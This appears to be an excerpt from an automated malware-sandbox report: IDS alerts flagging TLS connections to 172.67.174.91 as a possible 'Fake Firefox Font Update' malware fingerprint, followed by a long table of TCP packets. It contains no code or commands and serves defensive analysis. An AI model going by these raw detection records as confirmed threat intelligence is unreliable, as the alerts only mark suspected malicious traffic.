2025-01-09T14:42:20.263464+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49714	172.67.174.91	443	TCP
2025-01-09T14:42:21.591834+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49715	172.67.174.91	443	TCP
2025-01-09T14:42:22.689186+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49716	172.67.174.91	443	TCP
2025-01-09T14:42:50.924043+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49811	172.67.174.91	443	TCP
2025-01-09T14:42:52.762734+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49812	172.67.174.91	443	TCP
2025-01-09T14:42:53.147496+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49813	172.67.174.91	443	TCP
2025-01-09T14:42:53.698120+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49814	172.67.174.91	443	TCP
2025-01-09T14:42:54.480798+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49815	172.67.174.91	443	TCP
2025-01-09T14:42:54.483062+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49816	172.67.174.91	443	TCP
2025-01-09T14:42:56.182258+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49817	172.67.174.91	443	TCP
2025-01-09T14:42:56.758343+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49818	172.67.174.91	443	TCP
2025-01-09T14:42:57.930502+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49819	172.67.174.91	443	TCP
2025-01-09T14:42:58.461468+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49820	172.67.174.91	443	TCP
2025-01-09T14:42:59.337415+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49821	172.67.174.91	443	TCP
2025-01-09T14:42:59.726379+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49822	172.67.174.91	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 14:41:05.119376898 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.159382105 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.216964960 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.220215082 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.225003004 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.232530117 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.232544899 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.232556105 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.232619047 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.235378027 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.235480070 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.236336946 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.240231991 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.283417940 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.313846111 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.316320896 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.321285009 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.323034048 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.332564116 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.332575083 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.332633972 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.334549904 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.334629059 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.339454889 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.407623053 CET	49673	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:05.441365957 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.441380978 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.441390991 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.441528082 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.444565058 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.444605112 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.445135117 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.449681997 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.491381884 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.572943926 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.575807095 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.575894117 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.580583096 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.580632925 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.660370111 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.660415888 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.660496950 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.663502932 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.664290905 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.669331074 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.671010971 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.673010111 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.673021078 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.677934885 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.683547974 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.683559895 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.683633089 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.686064005 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.686829090 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.692990065 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.751343966 CET	49672	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:05.767182112 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.769557953 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.772092104 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.772103071 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.772149086 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.772165060 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.774486065 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.775202036 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.780524015 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.787309885 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.787328959 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.787391901 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.789060116 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.790533066 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.796042919 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.870037079 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.872602940 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.874769926 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.874780893 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.874866962 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.877717972 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.878550053 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.883714914 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.888514996 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.888526917 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:05.888596058 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.890579939 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.892254114 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:05.897851944 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.044914007 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.044929981 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.045033932 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.045592070 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.045603991 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.045664072 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.050113916 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.051165104 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.052009106 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.052841902 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.053231955 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.055968046 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.057710886 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.103380919 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.146359921 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.149058104 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.149575949 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.149593115 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.149682999 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.152363062 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.153143883 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.153850079 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.156965971 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.156982899 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.157023907 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.157042027 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.157949924 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.159929037 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.160665989 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.165507078 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.249080896 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.251703978 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.265649080 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.268091917 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.315421104 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.333913088 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.333975077 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.334166050 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.337202072 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.337996960 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.342077017 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.342879057 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.385049105 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.387705088 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.393446922 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.447113037 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.447161913 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.447325945 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.450232983 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.451133966 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.455813885 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.456913948 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.560040951 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.562843084 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.567775965 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.603055000 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.603104115 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.603117943 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.603132963 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.603179932 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.603199005 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.607142925 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.607920885 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.608953953 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.609656096 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.612720013 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.614428997 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.691662073 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.694504976 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.706492901 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.706509113 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.706568003 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.709630013 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.710057974 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.715569019 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.792247057 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.795480013 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.796170950 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.800976038 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.801048994 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.802665949 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.802870035 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.853849888 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.883969069 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.883996010 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.884047031 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.886981010 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.887073040 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.891789913 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.891937017 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.900914907 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.900933981 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.900949001 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:06.901000977 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.903779984 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.903779984 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:06.909327030 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.007424116 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.010355949 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.044411898 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.044425011 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.044435024 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.044528008 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.047168016 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.047233105 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.054559946 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.078207970 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.078224897 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.078392029 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.165661097 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.208251953 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.227082968 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.227112055 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.227211952 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.259337902 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.307401896 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.315761089 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.355551004 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.360620975 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.399898052 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.404444933 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.404536963 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.404763937 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.413481951 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.414824963 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.418318033 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.419641018 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.431225061 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.444808006 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.580404997 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.587696075 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.587744951 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.587802887 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.588309050 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.588329077 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.588367939 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.603293896 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.608140945 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.608155012 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.609601974 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.609934092 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.610634089 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.613004923 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.614532948 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.614897966 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.615427971 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.701735020 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.707510948 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.707530022 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.707648039 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.708894968 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.708933115 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.708965063 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.726775885 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.731579065 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.742675066 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.743654966 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.747694016 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.748718977 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.754405975 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.760782957 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.775861025 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.782980919 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.823482990 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.849528074 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.849582911 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.849688053 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.858072996 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.860306978 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.864175081 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.864219904 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.867029905 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.870379925 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.871782064 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.894469976 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.938704014 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.955756903 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.955857038 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.959098101 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.969825029 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.981014013 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:07.988138914 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:07.989132881 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.025377035 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.044636965 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.058970928 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.076658010 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.086369991 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.119054079 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.155280113 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.155344963 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.170458078 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.173186064 CET	49676	443	192.168.2.8	52.182.143.211
Jan 9, 2025 14:41:08.181653976 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.183326960 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.192547083 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.195735931 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.197815895 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.244060040 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.244101048 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.271852016 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.276757956 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.315002918 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.315365076 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.315376043 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.315438986 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.334492922 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.349519014 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.355649948 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.365190029 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.378313065 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.387193918 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.393073082 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.404627085 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.424103975 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.456312895 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.456330061 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.456455946 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.478154898 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.478197098 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.483458042 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.485599041 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.489562988 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.532069921 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.551425934 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:08.572351933 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:08.588287115 CET	49705	443	192.168.2.8	13.107.246.45
